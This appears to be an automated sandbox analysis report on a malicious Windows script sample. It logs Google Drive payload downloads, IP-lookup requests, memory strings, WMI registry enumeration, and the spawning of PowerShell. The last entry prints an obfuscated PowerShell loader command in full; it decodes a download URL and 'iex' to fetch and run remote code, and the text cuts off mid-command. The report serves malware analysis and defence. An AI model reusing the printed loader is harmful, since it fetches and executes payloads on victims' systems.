Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1hJyvgAVbPJ75WNnYmHvpQDkE9KTfZPsk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /download?id=1hJyvgAVbPJ75WNnYmHvpQDkE9KTfZPsk&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=11UG7RVZG7jjd35VnmVWbUd2Di0bkRH_h HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /download?id=11UG7RVZG7jjd35VnmVWbUd2Di0bkRH_h&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1hJyvgAVbPJ75WNnYmHvpQDkE9KTfZPsk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /download?id=1hJyvgAVbPJ75WNnYmHvpQDkE9KTfZPsk&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=11UG7RVZG7jjd35VnmVWbUd2Di0bkRH_h HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /download?id=11UG7RVZG7jjd35VnmVWbUd2Di0bkRH_h&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive |
Source: powershell.exe, 00000003.00000002.2960827104.0000026D5EFE7000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.v |
Source: wscript.exe, 00000000.00000003.2110367714.000001D994259000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2111079924.000001D994259000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2109551833.000001D9941CF000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en |
Source: wscript.exe, 00000000.00000003.1998762736.000001D99629D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1989814145.000001D996279000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1990131863.000001D9962A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1989700652.000001D99622D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2111762406.000001D9961F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1989437014.000001D9962A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1998511091.000001D99627B000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: wscript.exe, 00000000.00000003.1989814145.000001D996279000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1990131863.000001D9962A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1989700652.000001D99622D000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?2f79ca1147483 |
Source: wscript.exe, 00000000.00000003.2110367714.000001D994259000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2111079924.000001D994259000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2109551833.000001D9941CF000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabD |
Source: wscript.exe, 00000000.00000003.1989700652.000001D99622D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1989950107.000001D996255000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?2f79ca1147 |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D48A27000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D48A61000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000003.00000002.2942945182.0000026D56CF2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D46EA6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D46C81000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D46EA6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D46C81000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D47109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A27000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000003.00000002.2942945182.0000026D56CF2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000003.00000002.2942945182.0000026D56CF2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000003.00000002.2942945182.0000026D56CF2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D48A23000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googP |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D489B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D46EA6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D46EA6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1hJyvgAVbPJ75WNnYmHvpQDkE9KTfZPskP |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D48A4E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googh |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D48A4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D4710D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D48A4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D4710D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1hJyvgAVbPJ75WNnYmHvpQDkE9KTfZPsk&export=download |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D46EA6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D47F20000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000003.00000002.2942945182.0000026D56CF2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D47109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A27000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D47109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A27000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D47109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A27000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D47109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A27000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D47109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A27000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: unknown |
Network traffic detected: HTTP traffic on port 49706 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49707 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49707 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49718 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49706 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49716 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49717 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49716 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49717 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49718 -> 443 |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Riffelgange = 1;$Authorish='Substrin';$Authorish+='g';Function Shockhead($Kaputt){$Spisefrikvarterernes=$Kaputt.Length-$Riffelgange;For($Ratihabumr=5; $Ratihabumr -lt $Spisefrikvarterernes; $Ratihabumr+=(6)){$Udsagnsleddenes+=$Kaputt.$Authorish.Invoke($Ratihabumr, $Riffelgange);}$Udsagnsleddenes;}function sabotage($Velal){& ($Tanquelinian) ($Velal);}$Greenheart=Shockhead 'OutraMIndowoAigrezBestoiSkspolMusikl ,utsa Brne/Gr.nd5.itin.Afdel0Up,ai Zw ng(SynapWNjereiCoresnD,agsdTosdeoHerrgwkroe sbil,e .runeNStrafTPraec Forma1Myoli0The,m. Bort0Opfi,;Enkel Arch,WIrradiObsern Kyst6.odra4Banju; eval For axUdban6Czare4Spat ;under TayerrUnd,iv tred:M.ckb1Jacqu2Maime1 Seri.Deesk0Allop) Brad BeregGHemodeSalewc DiskkRandmoVolit/ Qu z2 Kruk0Fo.nu1Ordfo0 enio0,anlo1jetst0Invas1Gaska Knif.FS criiRgerirGillyeStridf Toitovexdex.nnek/Gener1Orke.2minst1Bo.it. ,eha0Dia,o ';$Feline=Shockhead 'StripUOverts PoliegalehrOsobe-ForaaASkinkgOmgiveEnwinnSanc tJinri ';$ostler=Shockhead 'goo,whKvikkt Nikot ousp udstsNemme:Ha dw/Tjles/GorvadAntiprChivei Sie.vKontreDansk.FellygPrivaoP eezoViolig B,dflAmpeleO var.IsospcSubtroMowbumJacke/Tilbau VictcOpsge?RibboeTurp.xI,prgpTelevoHofchrhavait pakk= NurtdbearloTrevewPutnanFu,ill.resuoextena SpirdSe vi& SundiHistodManja= Allo1FrugthEncheJ estyNymphvNucl gappasAA ninV U.pebPoachPUgtetJJol,e7 .eww5Lob.tW TyphNEndomnAnalyYharmem AliqHadvenv Al ypTurnuQGenerDKropskNy.tiE.nobs9 WindK BeunTMon sfapoloZDisozPSnesksAfvaekInte ';$Olympier=Shockhead 'Det r>R dio ';$Tanquelinian=Shockhead 'Succei,nackeFascixCiv l ';$Aminobenzamide = Shockhead 'PreloeForcec FilihGuelpoNone. B cki%B,ahmainterpInserpBrunldUd rmaAnd.lt KarbaAquar% Bri.\ kattPBlodrrIndhoe MonahNav,ea,egiststr,irmocame B lldAfsky.Unc.vFDomsfiJav.ldRevi Oc.i&Stnne&Chrys Skrine OvercHendehMelleoDm,ni Tritu$ sept ';sabotage (Shockhead 'Bigba$Storhg R,tilTrim oUnadvb DissaSamm.lCr,nk: CecoAForemaKi,kenUnfledSportePsychlToledyBramsdTan eeNrga nSmaafs Exce=rotte(T.skncB dummvalerdDelib Demat/InaudcBiogr Fa el$WretcAnormam ForsiEnneanmidnio ColebUnexteKlonen undsz SkumaBevilmTvrf i DestdFlexueB,lim)Adnot ');sabotage (Shockhead 'Form.$WienegPal.nlAlleyoballobEnedia BlgelStyre:ExpouUSchoon,mbets EngahLydliu Hel.nK.tukn.kraleUn.erdAlcoh=Overf$,iurooNaticsK,loltDimpll S,mieDann rforgl.Oplgns ominp DubblafgrsiGangat alsr(U orb$mush |